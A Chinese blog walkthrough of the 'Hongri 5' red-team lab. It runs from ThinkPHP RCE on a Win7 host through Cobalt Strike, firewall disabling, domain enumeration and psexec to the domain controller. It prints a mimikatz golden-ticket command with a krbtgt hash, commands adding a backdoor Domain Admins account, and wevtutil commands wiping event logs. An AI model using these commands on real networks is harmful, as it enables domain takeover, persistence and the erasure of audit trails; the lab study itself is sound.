跳到正文
Mo1u's blog 这趟旅行若是开心,亦是无负这一生
Go back

ATT&CK 红队靶场实战 - 红日靶场 5

网络配置

设备IP 地址
win7192.168.61.135(NAT), 192.168.138.136 (仅主机)
win2008 dc192.168.138.138(NAT)
主机密码

win7 leo@sun.com 123.com sun\Administrator dc123.com

2008 sun\admin 2020.com 更改为: 2026.com

win7启动phpstudy

初步渗透

拿到win7的ip192.168.61.135,nmap开扫

nmap -sV -Pn 192.168.61.135

Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 16:02 +0800
Nmap scan report for 192.168.61.135
Host is up (0.00045s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.5.38)
135/tcp  open  msrpc   Microsoft Windows RPC
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:28:BD:51 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.35 seconds


先看80端口,熟悉的笑脸,上thinkphp工具 确实有蛮多洞,先getshell,蚁剑上马

内网横向

getshell后上cs,先上监听器: 做个木马,传到win7机子上,蚁剑命令行执行 cs里用shell找一下网卡对应的ip,找到另一个网段:192.168.138.136/24

shell ipconfig

提权: 提权到SYSTEM后,关一下防火墙

shell netsh advfirewall show allprofiles
shell netsh advfirewall set allprofiles state off

看看是否存在域

shell net config Workstation

然后抓一下域成员

net view

 Server Name             IP Address                       Platform  Version  Type   Comment
 -----------             ----------                       --------  -------  ----   -------
 DC                      192.168.138.138                  500       6.1      PDC
 WIN7                    192.168.61.135                   500       6.1

抓一下密码凭证

fscan扫一下

C:/phpStudy/PHPTutorial/WWW/public/FScan_2.0.1_windows_x64.exe.exe -h 192.168.138.0/24 -o 1.txt

[2026-03-31 16:31:05] [HOST] 目标:192.168.138.136 状态:alive 详情:protocol=ICMP
[2026-03-31 16:31:05] [HOST] 目标:192.168.138.138 状态:alive 详情:protocol=ICMP
[2026-03-31 16:31:08] [HOST] 目标:192.168.138.1 状态:alive 详情:protocol=ICMP
[2026-03-31 16:31:08] [PORT] 目标:192.168.138.136 状态:open 详情:port=80
[2026-03-31 16:31:08] [PORT] 目标:192.168.138.138 状态:open 详情:port=389
[2026-03-31 16:31:08] [PORT] 目标:192.168.138.136 状态:open 详情:port=3306
[2026-03-31 16:31:08] [PORT] 目标:192.168.138.136 状态:open 详情:port=445
[2026-03-31 16:31:08] [PORT] 目标:192.168.138.136 状态:open 详情:port=139
[2026-03-31 16:31:08] [PORT] 目标:192.168.138.136 状态:open 详情:port=135
[2026-03-31 16:31:08] [PORT] 目标:192.168.138.138 状态:open 详情:port=445
[2026-03-31 16:31:08] [PORT] 目标:192.168.138.138 状态:open 详情:port=139
[2026-03-31 16:31:08] [PORT] 目标:192.168.138.138 状态:open 详情:port=135
[2026-03-31 16:31:08] [PORT] 目标:192.168.138.138 状态:open 详情:port=88
[2026-03-31 16:31:12] [SERVICE] 目标:192.168.138.136 状态:identified 详情:hostname=win7, ipv4=[192.168.138.136 192.168.61.135], ipv6=[]
[2026-03-31 16:31:12] [VULN] 目标:192.168.138.136 状态:vulnerable 详情:port=445, vulnerability=MS17-010, os=Windows 7 Professional 7601 Service Pack 1
[2026-03-31 16:31:12] [SERVICE] 目标:192.168.138.138 状态:identified 详情:hostname=DC, ipv4=[192.168.138.138], ipv6=[]
[2026-03-31 16:31:12] [SERVICE] 目标:192.168.138.136 状态:identified 详情:port=80, service=http, title=无标题, Url=http://192.168.138.136, status_code=200, length=931, server_info=map[content-length:931 content-type:text/html; charset=utf-8 date:Tue, 31 Mar 2026 08:31:12 GMT length:931 server:Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38 status_code:200 title:无标题 x-powered-by:PHP/5.5.38], fingerprints=[]
[2026-03-31 16:31:12] [SERVICE] 目标:192.168.138.138 状态:identified 详情:port=139, domain_name=sun.com, netbios_computer=DC, workstation_service=DC, server_service=DC, computer_name=DC.sun.com, netbios_domain=SUN, domain_controllers=SUN, os_version=Windows Server 2008 HPC Edition 7600
[2026-03-31 16:31:12] [VULN] 目标:192.168.138.138 状态:vulnerable 详情:os=Windows Server 2008 HPC Edition 7600, port=445, vulnerability=MS17-010
[2026-03-31 16:31:18] [VULN] 目标:http://192.168.138.136:80 状态:vulnerable 详情:vulnerability_type=poc-yaml-thinkphp5023-method-rce, vulnerability_name=poc1, references=[https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce]

psexec拿下域控

配置好smb psexec拿下域控

黄金票据

抓明文密码:

Session           : Interactive from 1
User Name         : admin
Domain            : SUN
Logon Server      : DC
Logon Time        : 2026/3/31 15:35:49
SID               : S-1-5-21-3388020223-1982701712-4030140183-1000

最后的 -1000 是 admin 账户的 RID(Relative ID),去掉它剩下的就是域 SID:S-1-5-21-3388020223-1982701712-4030140183 krbtgt 的RID是 502

mimikatz kerberos::golden /user:Administrator /domain:sun.com /sid:S-1-5-21-3388020223-1982701712-4030140183
  /krbtgt:65dc23a67f31503698981f2665f9d858 /ptt

或者直接用cs的功能

黄金票据的核心是 krbtgt 哈希签名,用户名字段 KDC 不会验证是否真实存在。 常见用法:

添加域控账户

shell net user hack 123qwe!@# /add /domain
shell net user /domain
shell net group "Domain Admins" hack /add /domain

清理痕迹

使用wevtutil进行清除

wevtutil cl security	//清理安全日志
wevtutil cl system		//清理系统日志
wevtutil cl application		//清理应用程序日志
wevtutil cl "windows powershell"	//清除power shell日志
wevtutil cl Setup


Next Post
ATT&CK 红队靶场实战 - 红日靶场 2